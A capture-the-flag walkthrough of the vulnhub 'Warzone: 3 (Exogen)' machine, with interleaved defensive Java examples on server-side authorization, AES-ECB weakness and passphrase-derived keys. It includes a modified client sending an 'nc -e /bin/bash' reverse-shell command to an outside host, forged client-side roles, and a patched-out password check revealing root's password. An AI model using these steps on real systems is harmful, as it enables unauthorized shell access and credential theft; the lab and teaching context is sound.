Warzone: 3 (Exogen) vulnhub walkthrough
2022-08-02 03:25:00 [xdeclearn]
Warzone: 3 (Exogen)
vulnhub URL: http://www.vulnhub.com/entry/warzone-3-exogen,606/
0x01 From recon to a shell
```
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4444/tcp open  tcpwrapped
```
Log in to FTP as anonymous and download note.txt and alienclient.jar. note.txt contains the login username alienum and the password exogenesis.
Next, decompile the jar and go straight to the interesting part.
In the actionPerformed method of Starter.java, the user's role is checked locally in the client (a client-side authorization flaw, confirmed while stepping through it in IDEA), so inserting role = "astronaut"; before the permission check is enough to elevate the role.
```java
public void actionPerformed(ActionEvent e) {
    if (e.getSource() == this.loginButton) {
        String username = this.userTextField.getText();
        String password = this.passwordField.getText();
        try {
            this.socket = new Socket("warzone.local", 4444);
            this.os = new ObjectOutputStream(this.socket.getOutputStream());
            RE login = new RE();
            login.setToken(null);
            login.setOption("LOGIN");
            login.setCmd(null);
            login.setValue(String.valueOf(username) + "@" + password);
            this.os.writeObject(login);
            this.is = new ObjectInputStream(this.socket.getInputStream());
            RE response = (RE) this.is.readObject();
            token = response.getToken();
            role = token.getRole();   // the role is kept client-side and trusted from here on
            this.os.close();
            this.socket.close();
            if (response.getValue().equals("TRUE")) {
                dashboard();
            } else {
                JOptionPane.showMessageDialog(this, "Invalid Username or Password");
            }
        } catch (IOException | ClassNotFoundException e1) {
            e1.printStackTrace();
        }
    }
    if (e.getSource() == this.resetButton) {
        this.userTextField.setText("");
        this.passwordField.setText("");
    }
    if (e.getSource() == this.showPassword) {
        if (this.showPassword.isSelected()) {
            this.passwordField.setEchoChar('0');
        } else {
            this.passwordField.setEchoChar('*');
        }
    }
    if (e.getSource() == this.viewButton) {
        role = "astronaut"; /* modified line */
        if (role.equals("researcher")) {
            JOptionPane.showMessageDialog(this, "Permission Denied");
        } else if (role.equals("astronaut")) {
            try {
                this.socket = new Socket("warzone.local", 4444);
                this.os = new ObjectOutputStream(this.socket.getOutputStream());
                RE list = new RE();
                token.setRole(role);   // the client-chosen role is sent back to the server
                list.setToken(token);
                list.setOption("VIEW");
                list.setCmd("LIST");
                list.setValue(null);
                this.os.writeObject(list);
                this.is = new ObjectInputStream(this.socket.getInputStream());
                RE response = (RE) this.is.readObject();
                this.os.close();
                this.socket.close();
                reportList(response.getValue());
            } catch (IOException | ClassNotFoundException e1) {
                e1.printStackTrace();
            }
        }
    }
    if (e.getSource() == this.uploadButton) {
        JOptionPane.showMessageDialog(this, "Has not been implemented");
    }
}
```
Following the code further: clicking a document in the view window sends list.setCmd("tail -5 " + f);, i.e. the client hands the server a shell command string. Change it to list.setCmd("nc -e /bin/bash 192.168.56.103 8080");, then recompile and run.
```java
public void reportList(String value) {
    JFrame view = new JFrame("View Reports");
    GridLayout list = new GridLayout(2, 2);
    Container containerLIst = view.getContentPane();
    containerLIst.setLayout(list);
    containerLIst.setBackground(Color.GRAY);
    String[] files = value.split("@");   // the server returns the file list joined with '@'
    for (final String f : files) {
        if (f.contains(".txt")) {
            JButton name = new JButton(f);
            name.addActionListener(new ActionListener() {
                public void actionPerformed(ActionEvent e) {
                    try {
                        Starter.this.socket = new Socket("warzone.local", 4444);
                        Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());
                        RE list = new RE();
                        list.setToken(Starter.token);
                        list.setOption("VIEW");
                        list.setValue("VALUE");
                        list.setCmd("nc -e /bin/bash 192.168.56.103 8080"); /* modified line */
                        Starter.this.os.writeObject(list);
                        Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());
                        RE response = (RE) Starter.this.is.readObject();
                        Starter.this.os.close();
                        Starter.this.socket.close();
                        Starter.this.reportValue(response.getValue());
                    } catch (IOException | ClassNotFoundException e1) {
                        e1.printStackTrace();
                    }
                }
            });
            containerLIst.add(name);
        }
    }
    view.setVisible(true);
    view.setBounds(10, 10, 370, 600);
    view.setDefaultCloseOperation(3);
    view.setResizable(true);
    view.show();
}
```
The reverse shell comes back.
```
[email protected]:~$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.56.103] from warzone.local [192.168.56.124] 56454
id
uid=1001(exomorph) gid=1001(exomorph) groups=1001(exomorph)
```
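Both weaknesses used above live in the same place: the server takes the role from the token the client sends back, and it runs the cmd string it receives. The following is an added example (not the challenge's server, whose code is not on the page) of how the listener on port 4444 could decide both questions itself. The RE field names and the astronaut/researcher roles follow the client code above; the class, method and file names are this example's own assumptions. The role is looked up in a server-side session table keyed by the token the server issued, cmd is a verb matched against a fixed set and implemented in Java rather than passed to a shell, the report name is confined to one directory, and the ObjectInputStream is given a class filter so readObject() can only instantiate the message type (Java 9+ API).

```java
import java.io.*;
import java.nio.file.*;
import java.util.*;

/* Added example: server-side authorization and command handling for a
   warzone-style report service. Everything here is assumed, not the challenge's code. */
public class ReportServerExample {

    /* Wire message shaped like the client's RE (assumed fields; token is an opaque id). */
    static final class RE implements Serializable {
        private static final long serialVersionUID = 1L;
        String token, option, cmd, value;
    }

    /* The role lives in the server's session table, keyed by the token it issued at LOGIN.
       A client that rewrites its own role variable changes nothing here. */
    private final Map<String, String> sessionRoles = new HashMap<>();
    private final Path reportDir;

    ReportServerExample(Path reportDir) {
        this.reportDir = reportDir.toAbsolutePath().normalize();
    }

    /* Credential checking is out of scope; on success bind a fresh random token to the role. */
    String login(String role) {
        String token = UUID.randomUUID().toString();
        sessionRoles.put(token, role);
        return token;
    }

    String handle(RE req) throws IOException {
        String role = sessionRoles.get(req.token);
        if (role == null) return "ERR no session";
        if (!"VIEW".equals(req.option)) return "ERR unsupported option";
        if (!"astronaut".equals(role)) return "ERR permission denied";
        /* cmd is a verb from a fixed set; it is never handed to a shell. */
        switch (req.cmd == null ? "" : req.cmd) {
            case "LIST": {
                List<String> names = new ArrayList<>();
                try (DirectoryStream<Path> ds = Files.newDirectoryStream(reportDir, "*.txt")) {
                    for (Path p : ds) names.add(p.getFileName().toString());
                }
                Collections.sort(names);
                return String.join("@", names);
            }
            case "TAIL":
                return tail(req.value, 5);
            default:
                return "ERR unknown command";
        }
    }

    /* The report name must be a plain *.txt inside reportDir; the last lines are read in Java. */
    private String tail(String name, int n) throws IOException {
        if (name == null || !name.endsWith(".txt") || name.contains("/") || name.contains("\\"))
            return "ERR bad file name";
        Path p = reportDir.resolve(name).normalize();
        if (!reportDir.equals(p.getParent()) || !Files.isRegularFile(p)) return "ERR no such report";
        List<String> lines = Files.readAllLines(p);
        return String.join("\n", lines.subList(Math.max(0, lines.size() - n), lines.size()));
    }

    /* readObject() on untrusted input instantiates whatever class the peer names, so the
       stream is restricted to the message type (plus String) before anything is read. */
    static ObjectInputStream filteredReader(InputStream in) throws IOException {
        ObjectInputStream ois = new ObjectInputStream(in);
        ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
                "ReportServerExample$RE;java.lang.String;!*"));
        return ois;
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(buf)) { oos.writeObject(o); }
        return buf.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        Path dir = Files.createTempDirectory("reports");   // constructed sample report directory
        Files.write(dir.resolve("mars.txt"), Arrays.asList("l1", "l2", "l3", "l4", "l5", "l6", "l7"));
        ReportServerExample srv = new ReportServerExample(dir);

        RE req = new RE();
        req.token = srv.login("researcher"); req.option = "VIEW"; req.cmd = "LIST";
        System.out.println(srv.handle(req));   // ERR permission denied, whatever the client's local role says

        req.token = srv.login("astronaut");
        System.out.println(srv.handle(req));   // mars.txt
        req.cmd = "TAIL"; req.value = "mars.txt";
        System.out.println(srv.handle(req));   // l3 .. l7
        req.value = "../../etc/passwd";
        System.out.println(srv.handle(req));   // ERR bad file name
        req.cmd = "tail -5 mars.txt; id";
        System.out.println(srv.handle(req));   // ERR unknown command

        /* The filter lets RE through and rejects any other class found in the stream. */
        RE echoed = (RE) filteredReader(new ByteArrayInputStream(serialize(req))).readObject();
        System.out.println("deserialized cmd: " + echoed.cmd);
        try {
            filteredReader(new ByteArrayInputStream(serialize(new ArrayList<String>()))).readObject();
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Compile and run it with any JDK 9 or newer; the forged-role, traversal and shell-string requests are all refused without the server ever consulting the role or command the client chose.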
0x02 Getting the anunnaki user
Download aliens.encrypted and wrz3encryptor.jar from /home/exomorph to the local machine (transferred with nc; steps omitted) and decompile wrz3encryptor.jar.
```java
private static void doCrypto(int cipherMode, String key, File inputFile, File outputFile) throws CryptoException {
    try {
        // the raw bytes of the key string are used directly as the AES key (no KDF)
        Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
        Cipher cipher = Cipher.getInstance("AES");   // on the JDK this is AES/ECB/PKCS5Padding
        cipher.init(cipherMode, secretKey);
        FileInputStream inputStream = new FileInputStream(inputFile);
        byte[] inputBytes = new byte[(int) inputFile.length()];
        inputStream.read(inputBytes);
        byte[] outputBytes = cipher.doFinal(inputBytes);
        FileOutputStream outputStream = new FileOutputStream(outputFile);
        outputStream.write(outputBytes);
        inputStream.close();
        outputStream.close();
    } catch (NoSuchPaddingException | java.security.NoSuchAlgorithmException | java.security.InvalidKeyException
             | javax.crypto.BadPaddingException | javax.crypto.IllegalBlockSizeException | java.io.IOException ex) {
        throw new CryptoException("Error encrypting/decrypting file", ex);
    }
}
```
It is plain AES; apparently the whole Warzone series likes to throw in a bit of crypto to confuse people. The decryption code follows:
```java
import java.io.File;
import java.nio.file.Files;
import java.security.Key;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class Wrz3Decrypt {
    public static void decrypt(String key, File inputFile, File outputFile) {
        doDeCrypto(Cipher.DECRYPT_MODE, key, inputFile, outputFile);   // DECRYPT_MODE == 2
    }

    private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {
        try {
            Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
            Cipher cipher = Cipher.getInstance("AES");   // same transformation as the encryptor
            cipher.init(cipherMode, secretKey);
            // read the whole file: a single InputStream.read() is not guaranteed to fill the buffer
            byte[] inputBytes = Files.readAllBytes(inputFile.toPath());
            byte[] outputBytes = cipher.doFinal(inputBytes);
            Files.write(outputFile.toPath(), outputBytes);
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    public static void main(String[] args) {
        // usage: java Wrz3Decrypt <key> aliens.encrypted aliens.txt
        decrypt(args[0], new File(args[1]), new File(args[2]));
    }
}
```
The code simply changes cipherMode from 1 (ENCRYPT_MODE) to 2 (DECRYPT_MODE), and the output gives the username and password anunnaki:nak1nak1..
```
[email protected]:~$ warzone3decrypt strings aliens.txt
minotaur:m1nom1no..
scylla:scyscy..
echidna:ech1ech1..
cyclops:cyccyc..
anunnaki:nak1nak1..
anunnaki:nak1nak2..
anunnaki:nakinaki..
```
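Two details of the encryptor are worth seeing on constructed data rather than just reading: Cipher.getInstance("AES") resolves to AES/ECB/PKCS5Padding, so identical 16-byte plaintext blocks (such as repeated credential lines) produce identical ciphertext blocks, and the raw string bytes must be exactly 16, 24 or 32 long or init fails. The following is an added example, not code from the challenge jar; the key, plaintext and file names are constructed for the demonstration.

```java
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;

/* Added example reproducing the encryptor's construction (raw string bytes as key,
   default "AES" transformation) to show the key-length rule and the ECB block leak. */
public class AesEcbDemo {

    /* Same primitive as doCrypto: "AES" alone selects AES/ECB/PKCS5Padding on the JDK. */
    static byte[] run(int mode, String key, byte[] input) throws Exception {
        byte[] k = key.getBytes(StandardCharsets.UTF_8);
        if (k.length != 16 && k.length != 24 && k.length != 32)
            throw new IllegalArgumentException("Invalid key length: " + k.length + " bytes (16, 24 or 32 required)");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(mode, new SecretKeySpec(k, "AES"));
        return cipher.doFinal(input);
    }

    /* File variant of the decryptor; readAllBytes avoids the short-read risk of one read() call. */
    static void decryptFile(String key, Path in, Path out) throws Exception {
        Files.write(out, run(Cipher.DECRYPT_MODE, key, Files.readAllBytes(in)));
    }

    /* Counts 16-byte ciphertext blocks that repeat an earlier block. Under ECB equal
       plaintext blocks give equal ciphertext blocks, so any count above 0 leaks structure. */
    static int duplicateBlocks(byte[] ct) {
        Set<String> seen = new HashSet<>();
        int dup = 0;
        for (int i = 0; i + 16 <= ct.length; i += 16) {
            String block = Base64.getEncoder().encodeToString(Arrays.copyOfRange(ct, i, i + 16));
            if (!seen.add(block)) dup++;
        }
        return dup;
    }

    public static void main(String[] args) throws Exception {
        String key = "0123456789abcdef";                          // constructed 16-byte key
        String text = "user:password..\nuser:password..\n";       // constructed: two identical 16-byte lines
        byte[] plain = text.getBytes(StandardCharsets.UTF_8);

        byte[] ct = run(Cipher.ENCRYPT_MODE, key, plain);
        System.out.println("ciphertext blocks that repeat an earlier block: " + duplicateBlocks(ct)); // 1

        Path enc = Files.createTempFile("aliens", ".encrypted");
        Path dec = Files.createTempFile("aliens", ".txt");
        Files.write(enc, ct);
        decryptFile(key, enc, dec);
        System.out.println("round trip ok: " + Arrays.equals(plain, Files.readAllBytes(dec)));

        try {
            run(Cipher.DECRYPT_MODE, "123", ct);                  // 3-byte key: rejected before init
        } catch (IllegalArgumentException e) {
            System.out.println(e.getMessage());
        }
    }
}
```

The duplicate-block count is the same check a reviewer can run against any ECB-encrypted file without knowing the key: repeated blocks in the ciphertext mean repeated content in the plaintext.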
Log in with SSH and look around the home directory.
```
[email protected]:~$ ls
info.txt  secpasskeeper.jar.gpg  underboss.txt
[email protected]:~$ cat info.txt
Remember to use --batch,
otherwise the passphrase options will be ignored when you decrypt the gpg file
You know the pa[ssh]phrase
[email protected]:~$ cat underboss.txt
......
EXOGEN {
WARZONE_UNDERBOSS_AL1EN }
```
0x03 Getting root
Decrypt secpasskeeper.jar.gpg as the hint says.
```
[email protected]:~$ gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg   # the passphrase is nak1nak1..
[email protected]:~$ ls
info.txt  secpasskeeper.jar  secpasskeeper.jar.gpg  underboss.txt
```
Transfer secpasskeeper.jar to the local machine with nc and reverse it. The check in Main compares the value derived from the typed passphrase with a value the program derives from its own bundled resources, so modify Main as follows:
```java
import java.io.UnsupportedEncodingException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Scanner;
import javax.crypto.BadPaddingException;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;

// Cryptor and Resources are the jar's own classes (not reproduced here)
public class Main {
    public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException,
            BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
        try {
            Scanner in = new Scanner(System.in);
            System.out.println("[Warzone 3] Root's Password Manager");
            System.out.print("Secret passphrase : ");
            String secret = in.nextLine();
            Cryptor cryptor = new Cryptor();
            Resources res = new Resources();
            String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));
            String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
            if (true /*user.equals(sys)*/) {
                /* modified line: the comparison is bypassed; the plaintext below never depends on `secret` */
                String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
                System.out.println("[+] Success, the password is : " + plaintext);
            } else {
                System.out.println("[x] Failed");
            }
        } catch (NullPointerException n) {
            System.out.println("[!] Terminated");
            System.exit(0);
        }
    }

    public static String removeSalt(String salted) {
        String unsalted = salted.replace("al13n", "");
        return unsalted;
    }
}
```
Type anything at the prompt and the root password ufo_phosXEN comes out.
```
[Warzone 3] Root's Password Manager
Secret passphrase : 123
[x] Invalid key length {
16 required}
[+] Success, the password is : ufo_phosXEN
```
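The reason one commented-out comparison is enough here is that the passphrase never contributes to the key: everything needed to recover the password ships inside the jar, and the typed secret is only compared against it. The following is an added example, not the secpasskeeper code, of the shape such a tool needs so that patching the binary does not help: the key is derived from the passphrase with PBKDF2, the stored blob is AES-GCM (authenticated), and a wrong passphrase fails the tag check instead of producing anything to print. Class names, parameters and the sample secret are this example's own.

```java
import javax.crypto.AEADBadTagException;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;

/* Added example: a passphrase-protected secret where the passphrase is the only source of
   the key. Nothing stored with the blob (salt, nonce, ciphertext, tag) decrypts it alone. */
public class PassphraseVaultDemo {
    private static final int SALT_LEN = 16, NONCE_LEN = 12, TAG_BITS = 128, ITERATIONS = 200_000;

    /* PBKDF2-HMAC-SHA256 turns the passphrase plus a random salt into a 256-bit AES key. */
    static SecretKeySpec deriveKey(char[] passphrase, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(passphrase, salt, ITERATIONS, 256);
        byte[] raw = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256").generateSecret(spec).getEncoded();
        spec.clearPassword();
        return new SecretKeySpec(raw, "AES");
    }

    /* blob layout: salt || nonce || ciphertext+tag */
    static byte[] seal(char[] passphrase, byte[] plaintext) throws Exception {
        byte[] salt = new byte[SALT_LEN], nonce = new byte[NONCE_LEN];
        SecureRandom rng = new SecureRandom();
        rng.nextBytes(salt);
        rng.nextBytes(nonce);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, nonce));
        byte[] ct = c.doFinal(plaintext);
        byte[] blob = new byte[SALT_LEN + NONCE_LEN + ct.length];
        System.arraycopy(salt, 0, blob, 0, SALT_LEN);
        System.arraycopy(nonce, 0, blob, SALT_LEN, NONCE_LEN);
        System.arraycopy(ct, 0, blob, SALT_LEN + NONCE_LEN, ct.length);
        return blob;
    }

    /* There is no equals() on a user-supplied value to patch out: a wrong passphrase
       yields a wrong key, the GCM tag does not verify, and doFinal throws. */
    static byte[] open(char[] passphrase, byte[] blob) throws Exception {
        byte[] salt = Arrays.copyOfRange(blob, 0, SALT_LEN);
        byte[] nonce = Arrays.copyOfRange(blob, SALT_LEN, SALT_LEN + NONCE_LEN);
        byte[] ct = Arrays.copyOfRange(blob, SALT_LEN + NONCE_LEN, blob.length);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, nonce));
        return c.doFinal(ct);
    }

    public static void main(String[] args) throws Exception {
        byte[] secret = "root-password-placeholder".getBytes(StandardCharsets.UTF_8);   // constructed
        byte[] blob = seal("correct horse".toCharArray(), secret);

        System.out.println("[+] " + new String(open("correct horse".toCharArray(), blob), StandardCharsets.UTF_8));
        try {
            open("123".toCharArray(), blob);
            System.out.println("[!] unreachable: wrong passphrase accepted");
        } catch (AEADBadTagException e) {
            System.out.println("[x] Failed: wrong passphrase, no plaintext produced");
        }
    }
}
```

With this layout a reverser holding the jar and the blob still has to guess the passphrase, and the iteration count is what makes each guess expensive; contrast that with the original, where removing one condition prints the answer.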
```
[email protected]:~$ su - root
Password:
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# ls
boss.txt  cron  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
[email protected]:~# cat boss.txt
......
EXOGEN {
WARZONE_FINAL_BOSS }
```
by Alienum with <3